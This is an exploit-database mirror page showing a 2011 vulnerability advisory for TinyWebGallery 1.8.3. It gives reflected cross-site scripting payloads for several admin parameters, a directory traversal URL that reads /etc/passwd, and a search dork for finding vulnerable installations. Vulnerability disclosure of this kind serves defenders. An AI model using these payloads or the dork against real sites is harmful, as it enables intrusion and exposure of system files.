bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/16090.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

37 lines
No EOL
1 KiB
Text
Raw Blame History

Date: 01/02/2011 (dd/MM/yyyy)
Script: TinyWebGallery
Version: 1.8.3 (No fixes yet, might work on other versions too).
Home: http://www.tinywebgallery.com
--
Vulnerability: Non-persistent XSS
Where:
~ File: /admin/index.php
~ Parameters: sview, tview, dir, item.
Examples:
http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?dir=<script>alert("xss")</script>
http://localhost/twg183/admin/index.php?action=chmod&item=<script>alert("xss")</script>
http://localhost/twg183/twg183/admin/index.php?action=chmod&item="><script>alert("xss")</script>
...
--
Vulnerability: Directory Traversal.
Where:
~ File: /admin/index.php
~ Parameters: item
Example:
http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd
--
Dork: "Photo Gallery powered by TinyWebGallery 1.8.3" (about 1.46M results)
- Yam Mesicka
- Israel
- www.Mesicka.com
Reference in a new issue View git blame Copy permalink